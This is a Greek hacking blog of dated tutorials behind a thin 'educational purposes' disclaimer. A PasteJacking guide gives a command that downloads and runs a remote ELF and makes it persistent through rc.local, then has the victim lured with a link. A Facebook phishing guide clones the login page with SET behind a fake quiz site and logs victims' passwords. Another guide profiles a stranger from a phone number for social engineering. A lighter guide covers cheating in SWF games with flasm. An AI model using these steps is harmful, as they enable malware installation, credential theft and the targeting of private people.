ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Τετάρτη, 6 Δεκεμβρίου 2017

Πως εφαρμοζουμε την επίθεση PasteJacking




Τι θα χρειαστειτε;

1.Kali linux




Ανοιγουμε ενα τερματικο αντιγραφουμε και κανουμε επικολληση την εντολη κατω



nethackpwn234d23ehbhb6rtfcvghdhthsj /dev/null; clear; curl https://transfer.sh/RWARv/ex.elf -o ex.elf &> /dev/null && chmod +x ./ex.elf && cp ex.elf /usr/share/ && sed -i '$ i /usr/share/ex.elf' /etc/rc.local && ./ex.elf & disown && clear
ls


μετα τρεχουμε την εντολη

ls

θα δουμε το αρχειο wget-log

το ανοιγουμε με την εντολη

nano wget-log

μεσα βλεπουμε τον υλισμικο κωδικο του μηχανηματος

*σε εσας θα ειναι διαφορετικος* πχ 524kdfmadf

τελος στελνουμε το url του αρθρου στο θυμα

με τον υλισμικο κωδικο

αν εχετε κανει σωστα τα βηματα θα δειτε συνεδρια με το θυμα

Τρίτη, 18 Απριλίου 2017

Πως τροποποιουμε ενα παιχνιδι SWF (Shock Wave Flash)




Τι θα χρειαστειτε;

1.Ενα παιχνιδι SWF
2.Kali Linux
3.gnash


Σε αυτο τον οδηγο θα μαθουμε πως να τροποποιουμε οποιοδηποτε παιχνιδι SWF με την βοηθεια του Flasm

πριν ξεκινησουμε θα χρειαστουμε το gnash ωστε να μπορουμε να παιξουμε παιχνιδια swf στα kali linux

οποτε ανοιγουμε ενα τερματικο και γραφουμε
apt-get install gnash

οταν τελειωσουμε ψαχνουμε για καποιο παιχνιδι που θελουμε να τροποποιησουμε

μπορειτε να κανετε αναζητηση "swf games free download" και να βρειτε καποιο να κατεβασετε η παταμε εδω


αν επιλεξουμε πχ το πρωτο


καταλαβαινετε ειναι εκτελεσιμο αρχειο και εμεις θελουμε να ειναι .swf

οποτε επιλεγουμε ακυρο και παταμε πανω στην εικονα του παιχνιδιου που θελουμε πχ το πρωτο παλι

θα δειτε οτι αν δεν εχετε κανει εγκατασταση του adobe flash player θα σας εμφανισει ενα κενο η θα σας πει οτι λυπει το plugin


πηγαινουμε εδω



και επιλεγουμε download

πηγαινουμε στις ληψεις η dowloads αναλογα αν εχετε ελληνικα η αγγλικα kali linux και ανοιγουμε το συμπιεσμενο αρχειο

 επιλεγουμε το libflashplayer.so και επιλεγουμε Αποσυμπιεση στον φακελο
/usr/lib/mozilla/plugins/


 η ανοιγουμε ενα τερματικο και γραφουμε

tar xzvf /root/Λήψεις/flash_player_npapi_linux.i386.tar.gz

και μετα

cp libflashplayer.so /usr/lib/mozilla/plugins/

ανανεωνουμε την σελιδα και βλεπουμε οτι ολα ειναι ενταξει


τωρα παταμε ctrl+i


πηγαινουμε στην καρτελα Media και στο Type κοιταμε να λεει object
και βρισκουμε το μεγεθος να ειναι πανω απο 0 bytes η το ονομα του παιχνιδιου.swf πχ

εφοσο το εχουμε επιλεγμενο επιλεγουμε Save As και το αποθηκευουμε στην επιφανεια εργασιας


ανοιγουμε το αρχειο.swf  με διπλο κλικ η με την εντολη gnasm αρχειο.swf


βλεπουμε οτι εχω μονο 3ς ζωες και 10 αστερακια


παιζωντας λιγο ειδα οτι ειμαι λιγο σκραπας σε αυτο το παιχνιδι

τωρα θα δουμε με το nasm αν μπορουμε να το τροποποιησουμε
τρεχουμε την εντολη

cd Επιφάνεια/ εργασίας

ωστε να ειμαστε σε αυτη την διαδρομη που εχουμε το αρχειο .swf

με την εντολη

flasm -d 3-foot-ninja.swf > allagh.txt

κανουμε αποσυμπιλευση του αρχειου swf σε αρχειο κειμενου .txt

τωρα ανοιγουμε το αρχειο κειμενου

τωρα ψαχνουμε με ctrl+f την λεξη lives δλδ ζωες


βλεπουμε οτι τις ονομαζει myLives οποτε εμεις εφοσον ξερουμε οτι στην αρχη ξεκιναει με 3ς ζωες τοτε ψαχνουμε
push 'myLives', 3


και το αλλαζουμε με 1000 και αποθηκευουμε


κανουμε συμπιληση με την εντολη

flasm -a allagh.txt


και τρεχουμε το αρχειο


και οπως βλεπετε 1000 ζωες ας παρουμε αλλο παιχνιδι

πχ το Age of Wars

εδω αλλαζω το επιπεδο της τεχνολογιας μου και τα χρηματα που εχω

και οπως βλεπετε ο αντιπαλος ειναι με ροπαλα ενω εγω με αεροπλανο και τανκς

Γενικα το flasm σας επιτρεπει να τροποποιησετε ενα αρχειο swf ακομα και κακοβουλα πχ


Πέμπτη, 13 Απριλίου 2017

Πως μαθαινουμε τα παντα για ενα αγνωστο ατομο;(Cluedo)



Τι θα χρειστειτε;

1.Καποιο στοιχειο απο το αγνωστο ατομο

2.Υπολογιστη η κινητο
3.Βασικες γνωσης κοινωνικης μηχανικης

Σε αυτον τον οδηγο θα γνωρισουμε την δυναμη του διαδικτυου και πως μπορουμε ευκολα να βρουμε και να μαθουμε τα παντα για ενα αγνωστο ατομο.

Ας αρχισουμε πχ εγω πηρα εναν τυχαιο αριθμο τηλεφωνου που ειδα σε μια κολωνα


οποτε απο αυτον τον αριθμο θα προσπαθησουμε να μαθουμε στοιχεια για τον κατοχο οπως

ονομα
ηλικια
φυλο
περιοχη
εργασια
προσωπικη κατασταση
ενδιαφεροντα

αν βρουμε ολα αυτα τα στοιχεια τοτε θα μπορουμε ευκολα να φτιαξουμε ενα ψυχολογικο προφιλ για το αγνωστο ατομο

εγω θα χρησιμοποιησω το κινητο μου σε αυτον τον οδηγο

οποτε ανοιγουμε το viber και κανουμε αναζητηση του αριθμου κινητου

εφοσον βλεπουμε οτι δεν εχει ο χρηστης λογαριασμο viber τοτε παμε μηπως βρουμε κατι στο facebook



και βλεπουμε οτι ειναι αντρας και ονομαζεται Κωνσταντινος
αν συνεχισουμε τοτε βλεπουμε οτι η αγγελια αφορα την Herbal life

και ο αγαπητος Κωνσταντινος "δουλευει" στην Herbal life 
αν συνεχισουμε θα δουμε καποια απο τα ενδιαφεροντα του

 οπως Σπορ ,μουσικη
 ταινιες κτλ

αν ψαξω περισσοτερο θα δω οτι ο Κωνσταντινος εκλεισε τα 29



ολα αυτα σιγα σιγα βοηθανε να φτιαξουμε ενα ψυχολογικο προφιλ ωστε να εφαρμοσουμε κοινωνικη μηχανικη και να μαθουμε ακομα περισσοτερα η ακομα να πετυχουμε καποιο κακοβουλο σκοπο

πχ
οπως βλεπετε ευκολα μπορεσαμε να βρουμε απο ενα στοιχειο το αγνωστο ατομο
βεβαια ετυχε και το συγκεκριμενο ατομο δεν ξερει καν τι παει να πει προστασια της προσωπικης  ζωης αλλα ακομα και αν ηξερε πανω κατω με λιγη αναζητηση ολοι αφηνουν στοιχεια

σκοπος αυτου του οδηγου βεβαια δεν ειναι να σας δειξω κατι που  οι περισσοτεροι  γνωριζουν αλλα για το πως ευκολα μπορει ο καθενας να μαθει τα παντα για εσας.......

Πέμπτη, 22 Δεκεμβρίου 2016

Πως κλεβουμε κωδικους Facebook(Phising your Ego Attack)



Σε αυτο τον οδηγο θα μαθουμε την επιθεση Phising your Ego

Γιατι εδωσα αυτη την ονομασια θα καταλαβετε στο τελος του οδηγου


Τι θα χρειαστειτε;

1.Kali Linux
2.Domain name

Πηγαινουμε εδω κανουμε εγραφη και καταχωρουμε ενα domain name


οταν επιλεξετε checkout θα σας παει εδω

ανοιγουμε ενα τερματικο και γραφουμε

curl ipinfo.io


σημειωνουμε την εξωτερικη μας ip

τωρα πηγαινουμε πισω στο freenom και επιλεγουμε use dns και βαζουμε την εξωτερικη μας ip


επιλεγουμε continue αποδεχομαστε τους ορους και επιλεγουμε complete order

περιμενουμε περιπου 5-10 λεπτα ωστε να γινει η ανακατευθυνσει του domain name στην εξωτερικη μας ip

το δικο μου domain name ειναι find-out.ml

για να το επιβεβαιωσουμε γραφουμε ping find-out.ml εσεις κανετε ping το δικο σας

αν δειτε οτι εμφανιζετε η εξωτερικη σας ip τοτε εχει γινει η ανακατευθυνσει

πχ


τωρα πηγαινουμε στο router μας http://192.168.1.1 η http://192.168.2.1 η http://192.168.1.254 βαζουμε το ονομα χρηστη και κωδικο πηγαινουμε firewall και επιλεγουμε DMZ εκει θα επιλεξουμε enable και θα βαλουμε την εσωτερικη μας ip

για να δουμε την εσωτερικη μας ip απλα γραφουμε σε ενα τερματικο ifconfig


πχ η δικια μου ειναι 192.168.1.2

τωρα θα χρησιμοποιησουμε το SET(Social engineering Toolkit) για να κλωνοποιησουμε την σελιδα του facebook

οποτε γραφουμε σε ενα τερματικο setoolkit



επιλεγουμε 1 Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner

το SET θα μας ρωτισει την ip που θα μας στελνουν τα αποτελεσματα εμεις βαζουμε το domain name μας


και γραφουμε την σελιδα που θελουμε να κλωνοποιησουμε

πχ

παταμε enter και το SET θα αντιγραψει την σελιδα του facebook και θα ξεκινισει τον apache server μας

εμεις παταμε ctrl+c ωστε να βγουμε απο το SET

τωρα στην διαδρομη /var/www/html του apache θα δουμε 3 αρχεια το ενα index.html ,post.php και harvester-(με ημερομηνια/ωρα).txt

με την εντολη mv /var/www/html/index.html /var/www/html/login κανουμε μεταονομασια του αρχειου index.html σε login

πηγαινουμε στον φακελο 

τωρα  εφοσον ειμαστε στο browser μας (περιηγητη) παταμε ctrl+shift+P για να παμε σε μυστικη λειτουργεια (igognito mode)



 γραφουμε πανω στην url http://el.nametests.com


διαλεγουμε ενα test που πιστευετε οτι θα τραβηξει τα θυματα σας πχ εγω διαλεξα μιας και ειναι και επικαιρο

παταμε shift + print screen θα μας εμφανισει εναν σταυρο και επιλεγουμε το πλαισιο της εικονας αυτο στην ουσια ειναι print screen με αποκοπη οποτε εμεις θελουμε να βγαλουμε μονο αυτο

η εικονα θα εχει αποθηκευτει στον φακελο pictures εμεις βρισκουμε την εικονα την μετα ονομαζουμε σε pic.jpg απο .png 

και την μεταφερουμε στον φακελο /var/www/html/

τωρα πηγαινουμε στην σελιδα nametests και παταμε ctrl+u για να δουμε τον κωδικα της σελιδας

παταμε ctrl+a για να τον επιλεξουμε ολο και ctrl+c για αντιγραφη


γραφουμε σε ενα τερματικο leafpad /var/www/html/index.html και κανουμε επικολληση του κωδικα που αντιγραψαμε πριν

πχ


πριν αποθηκευσουμε κανουμε τις εξεις αλλαγες

διαγραφουμε αυτες τι γραμμες


<meta property="fb:admins" content="1************"/>
<meta property="fb:admins" content="1************"/>
<meta property="fb:app_id" content="1************"/>


αλλαζουμε τις γραμμες
<meta property="og:site_name" content="nametests.com"/>
σε
<meta property="og:site_name" content="domain name sas"/>
μετα
<meta name="author" content="nametests">
σε
<meta name="author" content="domain sas">
μετα
<meta property="og:url" content="http://el.nametests.com/test/ti-tha-pareis-apo-ton-agio-basile/14969/"/>
σε
<meta property="og:url" content="http://domain name sas/index.html"/>
μετα
<meta property="og:image" content="//image.nametests.com/promote_image/2016/11/30/67503e29aaa1afgdserfs9978a3d8a42d7.jpg"/>
σε
<meta property="og:image" content="http://domain name/pic.jpg"/>

μετα
loginURL_basicperms: '/accounts/facebook/login/?scope=email%2Cpublic_profile&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1',
loginURL_postperms: '/accounts/facebook/login/?auth_params=auth_type%3Drerequest&scope=PERMSLIST&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1'

πριν αλλαξετε το

loginURL_postperms: '/accounts/facebook/login/?auth_params=auth_type%3Drerequest&scope=PERMSLIST&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1'

καντε το αντιγραφει

ανοιγουμε το post.php και κανουμε αντικατασταση το http://www.facebook/


προσθετουμε στην αρχη http://nametests/ και κανουμε επικολληση


αποθηκευουμε το post.php

στον index.html αλλαζουμε σε

loginURL_basicperms: '/login',
loginURL_postperms: '/login'

απο
loginURL_basicperms: '/accounts/facebook/login/?scope=email%2Cpublic_profile&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1',
loginURL_postperms: '/accounts/facebook/login/?auth_params=auth_type%3Drerequest&scope=PERMSLIST&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1'

αποθηκευουμε και ειμαστε ετοιμοι

τωρα κανουμε εναν restart τον apache server μας με την εντολη

service apache2 reload

τωρα μας μενει να κοινοποιησουμε τον συνδεσμο δημοσια η σε μια ομαδα η στο προφιλ τους θυματος η στο δικο μας προφιλ


ο συνδεσμος θα ειναι http://domain name sas/

οταν καποιος πατησει στον συνδεσμο θα δει αυτο


 οταν πατησει συνδεσου στο facebook


 οταν βαλει τα κριτηρια συνδεσης του , εσεις θα τα εχετε παρει

με την εντολη tail -f /var/www/html/harvester*.txt θα βλεπετε τους κωδικους των θυματων


μετα στο θυμα θα του εμφανιστει αυτο

και μετα θα τον παει στην κανονικη σελιδα κτλ χωρις να καταλαβει τιποτα

Με την συγκεκριμενη μεθοδο 8/10 ατομα την πατανε.

Η επιθεση πηρε αυτο το ονομα γιατι οι ποιο πολλοι χρηστες του διαδικτυου παντα θελουν να εξωτερικευουν το εγω τους  στα social media ,αυτο βεβαια εχει σαν αντικτυπο να βγαζουν στην φορα την προσωπικη τους ζωη και να βοηθανε κακοβουλους χρηστες να εφαρμοσουν την τεχνη της κοινωνικης μηχανικης εναντιον τους.

Η συγκεκριμενη σελιδα που κλωνοποιησα σου περνει το access token απο το facebook ....το access token ειναι στην ουσια το email και ο κωδικος σας ......οποτε ο ιδιοκτητης της εφαρμογης μπορει να λαμβανει διαφορες πληροφοριες απο το προφιλ σας οπως αναγνωση μηνυματων η ακομα να κοινοποιει διαφορα χωρις να το γνωριζετε.Οποτε σε κανει να αναρωτιεσε τι ειναι ποιο σωστο......να περνει τα στοιχεια σου ενας κακοβουλος χρηστης η ο προγραμματιστης της εφαρμογης?